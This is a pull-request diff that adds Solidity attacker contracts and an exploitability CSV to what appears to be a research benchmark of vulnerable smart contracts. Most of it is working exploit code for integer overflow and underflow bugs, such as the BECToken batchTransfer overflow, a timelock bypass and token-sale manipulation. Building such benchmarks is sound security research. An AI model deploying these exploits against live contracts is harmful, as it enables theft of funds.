Merge pull request #31 from ASSERT-KTH/arithmetic-solidity-0.8.0

Arithmetic solidity 0.8.0

smartbugs-curated/0.8.x/contracts/arithmetic/BECToken_attack.sol

@@ -0,0 +1,18 @@
+pragma solidity ^0.8.0;
+
+import "../dataset/arithmetic/BECToken.sol";
+
+contract BecTokenAttacker {
+    BecToken public target;
+
+    function attack(address _target) public {
+        target = BecToken(_target);
+        address[] memory recipients = new address[](2);
+        recipients[0] = address(this);
+        recipients[1] = address(0x0);
+
+        uint256 max = 2**255;
+        target.batchTransfer(recipients, max);
+    }
+
+}

smartbugs-curated/0.8.x/contracts/arithmetic/exploits.csv

@@ -0,0 +1,16 @@
+file path, exploitable and exposed
+arithmetic/BECToken.sol, True
+arithmetic/insecure_transfer.sol, False
+arithmetic/integer_overflow_1.sol, True
+arithmetic/integer_overflow_add.sol, True
+arithmetic/integer_overflow_benign_1.sol, False
+arithmetic/integer_overflow_mapping_sym_1.sol, True
+arithmetic/integer_overflow_minimal.sol, True
+arithmetic/integer_overflow_mul.sol, True
+arithmetic/integer_overflow_multitx_multifunc_feasible.sol, True
+arithmetic/integer_overflow_multitx_onefunc_feasible.sol, True
+arithmetic/overflow_simple_add.sol, True
+arithmetic/overflow_single_tx.sol, True
+arithmetic/timelock.sol, True
+arithmetic/token.sol, True
+arithmetic/tokensalechallenge.sol, True

smartbugs-curated/0.8.x/contracts/arithmetic/integer_overflow_1_attack.sol

@@ -0,0 +1,17 @@
+pragma solidity ^0.8.0;
+
+import "../dataset/arithmetic/integer_overflow_1.sol";
+
+contract OverflowAttacker {
+    Overflow public victim_contract;
+
+    constructor (address _overflowAddress) {
+        victim_contract = Overflow(_overflowAddress);
+    }
+
+    function addMax() public {
+        uint maxUint = 2**256 - 1;
+
+        victim_contract.add(maxUint);
+    }
+}

smartbugs-curated/0.8.x/contracts/arithmetic/integer_overflow_add_attack.sol

@@ -0,0 +1,19 @@
+pragma solidity ^0.8.0;
+
+import "../dataset/arithmetic/integer_overflow_add.sol";
+
+contract IntegerOverflowAddAttacker {
+    IntegerOverflowAdd public victim_contract;
+
+    constructor (address _overflowAddress) {
+        victim_contract = IntegerOverflowAdd(_overflowAddress);
+    }
+
+    function attack() public {
+        uint maxUint = 2**256 - 1;
+
+        // Call the add function with a value that will cause an overflow
+        victim_contract.run(maxUint - victim_contract.count());
+        victim_contract.run(1);
+    }
+}

smartbugs-curated/0.8.x/contracts/arithmetic/integer_overflow_benign_1_attack.sol

@@ -0,0 +1,18 @@
+pragma solidity ^0.8.0;
+
+import "../dataset/arithmetic/integer_overflow_benign_1.sol";
+
+contract IntegerOverflowBenign1Attacker {
+    IntegerOverflowBenign1 victimContract;
+
+    constructor (address _victimAddress) {
+        victimContract = IntegerOverflowBenign1(_victimAddress);
+    }
+
+    function attack() public {
+        uint256 count = victimContract.count();
+
+        victimContract.run(count);
+        victimContract.run(1);
+    }
+}

smartbugs-curated/0.8.x/contracts/arithmetic/integer_overflow_minimal_attack.sol

@@ -0,0 +1,18 @@
+pragma solidity ^0.8.0;
+
+import "../dataset/arithmetic/integer_overflow_minimal.sol";
+
+contract IntegerOverflowMinimalAttacker {
+    IntegerOverflowMinimal victimContract;
+
+    constructor (address _victimAddress) {
+        victimContract = IntegerOverflowMinimal(_victimAddress);
+    }
+
+    function attack() public {
+        uint256 count = victimContract.count();
+
+        victimContract.run(count);
+        victimContract.run(1);
+    }
+}

smartbugs-curated/0.8.x/contracts/arithmetic/integer_overflow_mul_attack.sol

@@ -0,0 +1,16 @@
+pragma solidity ^0.8.0;
+
+import "../dataset/arithmetic/integer_overflow_mul.sol";
+
+contract IntegerOverflowMulAttacker {
+    IntegerOverflowMul victimContract;
+
+    constructor (address _victimAddress) {
+        victimContract = IntegerOverflowMul(_victimAddress);
+    }
+
+    function attack() public {
+        uint256 largeNumber = 2**256 / 2;
+        victimContract.run(largeNumber);
+    }
+}

smartbugs-curated/0.8.x/contracts/arithmetic/integer_overflow_multitx_multifunc_feasible_attack.sol

@@ -0,0 +1,17 @@
+pragma solidity ^0.8.0;
+
+import "../dataset/arithmetic/integer_overflow_multitx_multifunc_feasible.sol";
+
+contract IntegerOverflowMultiTxMultiFuncFeasibleAttacker {
+    IntegerOverflowMultiTxMultiFuncFeasible public target;
+
+    constructor (address _targetAddress) {
+        target = IntegerOverflowMultiTxMultiFuncFeasible(_targetAddress);
+    }
+
+    function attack() public {
+        target.init();
+
+        target.run(2);
+    }
+}

smartbugs-curated/0.8.x/contracts/arithmetic/integer_overflow_multitx_onefunc_feasible_attack.sol

@@ -0,0 +1,17 @@
+pragma solidity ^0.8.0;
+
+import "../dataset/arithmetic/integer_overflow_multitx_onefunc_feasible.sol";
+
+contract IntegerOverflowMultiTxOneFuncFeasibleAttacker {
+    IntegerOverflowMultiTxOneFuncFeasible public target;
+
+    constructor (address _targetAddress) {
+        target = IntegerOverflowMultiTxOneFuncFeasible(_targetAddress);
+    }
+
+    function attack() public {
+        target.run(2);
+
+        target.run(2);
+    }
+}

smartbugs-curated/0.8.x/contracts/arithmetic/overflow_simple_add_attack.sol

@@ -0,0 +1,20 @@
+pragma solidity 0.8.0;
+
+import "../dataset/arithmetic/overflow_simple_add.sol";
+
+contract Overflow_AddAttacker {
+    Overflow_Add victimContract;
+
+    constructor (address _victimAddress) {
+        victimContract = Overflow_Add(_victimAddress);
+    }
+
+    function attack() public {
+
+        uint256 balance = victimContract.balance();
+        uint256 max = 2**256 - 1 - balance;
+
+        victimContract.add(max);
+        victimContract.add(1);
+    }
+}

smartbugs-curated/0.8.x/contracts/arithmetic/overflow_single_tx_attack.sol

@@ -0,0 +1,43 @@
+pragma solidity ^0.8.0;
+
+import "../dataset/arithmetic/overflow_single_tx.sol";
+
+contract IntegerOverflowSingleTransactionAttacker {
+    IntegerOverflowSingleTransaction public target;
+
+    constructor (address _targetAddress) {
+        target = IntegerOverflowSingleTransaction(_targetAddress);
+    }
+
+    function attackOverflowAddToState() public {
+        uint256 largeNumber = 2**256 - 1;
+        target.overflowaddtostate(largeNumber);
+    }
+
+    function attackOverflowMulToState() public {
+        uint256 largeNumber = 2**255;
+        target.overflowmultostate(largeNumber);
+        target.overflowmultostate(2);
+    }
+
+    function attackUnderflowToState() public {
+        uint256 number = 2;
+        target.underflowtostate(number);
+    }
+
+    function attackOverflowAddLocalOnly() public {
+        uint256 largeNumber = 2**256 - 1;
+        target.overflowlocalonly(largeNumber);
+    }
+
+    function attackOverflowMulLocalOnly() public {
+        uint256 largeNumber = 2**255;
+        target.overflowmulocalonly(largeNumber);
+        target.overflowmulocalonly(2);
+    }
+
+    function attackUnderflowLocalOnly() public {
+        uint256 number = 2;
+        target.underflowlocalonly(number);
+    }
+}

smartbugs-curated/0.8.x/contracts/arithmetic/timelock_attack.sol

@@ -0,0 +1,31 @@
+ pragma solidity ^0.8.0;
+
+ import "../dataset/arithmetic/timelock.sol";
+
+ contract TimeLockAttacker {
+    TimeLock public target;
+
+    constructor (address _targetAddress) public {
+        target = TimeLock(_targetAddress);
+    }
+
+    function deposit() public payable {
+        target.deposit{value: msg.value}();
+    }
+
+    function attack() public {
+
+        uint256 timeLock = target.lockTime(address(this));
+        uint256 overflowValue = 2**256 - 1 - timeLock + 1;
+        target.increaseLockTime(overflowValue);
+
+    }
+
+    function withdraw() public {
+        target.withdraw();
+    }
+
+    receive() external payable {}
+
+    fallback () external payable {}
+ }

smartbugs-curated/0.8.x/contracts/arithmetic/token_attack.sol

@@ -0,0 +1,18 @@
+pragma solidity ^0.8.0;
+
+import "../dataset/arithmetic/token.sol";
+
+ contract TokenAttacker {
+  Token target;
+
+  constructor (address _token) {
+    target = Token(_token);
+  }
+
+  function attack(address to) public {
+    uint256 balance = target.balanceOf(address(this));
+    uint256 value = balance + 1;
+    target.transfer(to, value);
+  }
+
+ }

smartbugs-curated/0.8.x/contracts/arithmetic/tokensalechallenge_attack.sol

@@ -0,0 +1,21 @@
+pragma solidity ^0.8.0;
+
+import "../dataset/arithmetic/tokensalechallenge.sol";
+
+contract TokenSaleChallengeAttacker {
+    TokenSaleChallenge public target;
+
+    function attack_buy(address _target) public payable {
+        target = TokenSaleChallenge(_target);
+        uint256 numTokens = 2**238;
+        target.buy{value: msg.value}(numTokens);
+    }
+
+    function attack_complete(address _target) public payable {
+        attack_buy(_target);
+        target.sell(1);
+    }
+
+    receive() external payable {}
+
+}